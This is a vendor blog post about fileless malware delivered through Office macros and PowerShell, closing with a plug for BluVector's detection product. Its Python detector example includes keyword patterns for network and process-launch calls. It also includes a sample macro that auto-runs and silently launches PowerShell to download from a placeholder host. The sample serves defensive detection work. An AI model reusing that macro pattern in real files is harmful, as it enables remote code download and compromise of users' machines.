Fileless Malware: If You’re Not Worried, You Should Be
While the message that “crime does not pay” was drilled into our heads in TV and movies… it seems that this crime does.
The first computer “virus” can be traced back to 1971. Named “Creeper system,” it would infect the computer with the message “I’m the creeper, catch me if you can!” and would disable that workstation.
Over the years, the bad guys have continued to hone their tools, and the computer virus has paved the way for computer worms, ransomware, spyware, adware, trojan horses, keyloggers, rootkits and other malicious software. While each has its own unique traits, the intent is the same — infecting a computer to do something “evil” on behalf of a threat actor.
As the cat-and-mouse game between security professionals and threat actors plays out on a daily basis, a new threat is emerging that is keeping the good guys up at night. The threat of fileless malware is increasing and brings a unique set of challenges to a security industry that still thinks primarily about how to combat file-based attacks.
Fileless malware describes a set of attacks that use the underlying operating system, usually Microsoft Windows, against itself. A typical end user barely scratches the surface of the capabilities built into the operating system. Under the hood of Windows are over 100 legitimate Windows system tools including PowerShell, Windows Management Instrumentation (WMI), .NET and Microsoft Office Macros that can be exploited in a fileless malware attack.
These tools do serve a purpose in the typical enterprise. PowerShell is used by system administrators to automate tasks; WMI is used to manage Windows workstations on a network; .NET is used for custom application development; and Microsoft Office Macros can be used to work magic in Microsoft Word, Excel or PowerPoint.
So, how can you protect against these types of attacks? Turning everything off isn’t possible: a typical enterprise would quickly grind to a halt (and it would be technically impossible in practice).
The first thing to keep in mind is that the most common attack vector for fileless malware attacks is delivery as an attachment to an email. Microsoft Office documents or PDF files are often used to deliver a payload with malicious intent. The payload will attempt to use one or more legitimate Windows tools to execute a script or macro and exploit that workstation. Because they use legitimate Windows functions, these payloads are hard to detect, so threat actors can hide in the shadows of what looks to be normal activity.
Existing, signature-based security can help with known threats, yet it struggles to protect against fileless malware attacks. The payload seems legitimate and will not raise any red flags. The key to protecting against fileless malware is to look beyond the payload’s contents and instead understand what that payload is capable of.
While great efforts have been made to educate end users to recognize when an email doesn’t look right and to give them a mechanism to report it to the security team, this is only part of the solution. It only takes one user opening an attachment they should not have to cause a problem.
This is where machine learning (ML) and artificial intelligence (AI) can play a large part in the defense of a network. ML and AI can analyze files and network traffic at line speeds and determine if that content has the potential to do something malicious. A Microsoft Excel spreadsheet with a macro that calculates commissions for a sales team is likely legitimate, but a spreadsheet that executes a Microsoft PowerShell command to download a piece of code is probably not.
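The capability-based view described above (judge what a macro can do, not whether its hash is known) can be sketched as a small scoring routine. The Python below is an added example written for this post; it is not BluVector’s product or code. The indicator table, the weights and thresholds, and the two sample macros are all constructed for illustration: one macro that only does arithmetic over a worksheet, and one that auto-runs, launches PowerShell and reaches out to the network, which is the profile the post calls out.

```python
import re

# Capability indicators for VBA macro source: (name, weight, regex, meaning).
# Constructed for this example; a production model would be far richer than a
# handful of keyword patterns. The point is that we score capabilities
# (auto-execution, process launch, network access, evasion), not signatures.
INDICATORS = [
    ("auto_exec", 2, r"\b(Auto_?Open|Workbook_Open|Document_Open|AutoExec)\b",
     "runs automatically when the document is opened"),
    ("process_launch", 3, r"\b(Shell|WScript\.Shell|CreateObject)\b",
     "can start external processes or COM objects"),
    ("powershell", 3, r"\bpowershell(\.exe)?\b",
     "hands control to PowerShell"),
    ("network", 3,
     r"\b(DownloadString|DownloadFile|URLDownloadToFile|Invoke-WebRequest|XMLHTTP|WinHttpRequest)\b",
     "fetches content from the network"),
    ("evasion", 2, r"-(EncodedCommand|enc)\b|-WindowStyle\s+Hidden|\bvbHide\b",
     "hides the window or obfuscates the command"),
]

# Constructed sample: a commissions calculator, the kind of macro a sales
# team would legitimately ship in a spreadsheet.
BENIGN_MACRO = """
Sub CalculateCommissions()
    Dim r As Long
    For r = 2 To 101
        Cells(r, 4).Value = Cells(r, 3).Value * 0.05
    Next r
End Sub
"""

# Constructed sample: auto-runs on open, hides its window, launches PowerShell
# and fetches something from a placeholder URL (example.invalid is reserved
# and never resolves).
SUSPICIOUS_MACRO = """
Private Sub Workbook_Open()
    Dim cmd As String
    cmd = "powershell.exe -WindowStyle Hidden -Command Invoke-WebRequest http://example.invalid/stage"
    Shell cmd, vbHide
End Sub
"""


def assess_macro(vba_source: str) -> dict:
    """Score a VBA macro by the capabilities its source exhibits.

    Returns a dict with the total score, the matched capabilities (name ->
    meaning) and a verdict of "allow", "review" or "block".
    """
    capabilities = {}
    score = 0
    for name, weight, pattern, meaning in INDICATORS:
        if re.search(pattern, vba_source, re.IGNORECASE):
            capabilities[name] = meaning
            score += weight
    # A macro that can both launch processes and reach the network matches the
    # "download and run" profile; the combination matters more than any single
    # keyword, which on its own would flag plenty of legitimate automation.
    if "process_launch" in capabilities and "network" in capabilities:
        verdict = "block"
    elif capabilities:
        verdict = "review"
    else:
        verdict = "allow"
    return {"score": score, "capabilities": capabilities, "verdict": verdict}


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_MACRO), ("suspicious", SUSPICIOUS_MACRO)):
        result = assess_macro(src)
        print(f"{label}: verdict={result['verdict']} score={result['score']}")
        for name, meaning in result["capabilities"].items():
            print(f"  - {name}: {meaning}")
```

The routine runs on extracted macro text; in practice that text would come from an attachment-scanning pipeline that pulls the VBA project out of the Office file before the message reaches an inbox. The verdict keys on the pairing of process launch with network access rather than on any one keyword, because `Shell` or `CreateObject` alone appears in a great deal of legitimate administrative automation.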
A well-trained workforce is a key part of network defense, but it doesn’t scale. An effective defense needs to analyze traffic as it comes across the network and stop it before it makes it into users’ inboxes.
The good news is that the Speculative Code Execution in BluVector Advanced Threat Detection™ was created to help with the detection of fileless malware within an organization’s network environment. If you’re already a customer, you already have this capability.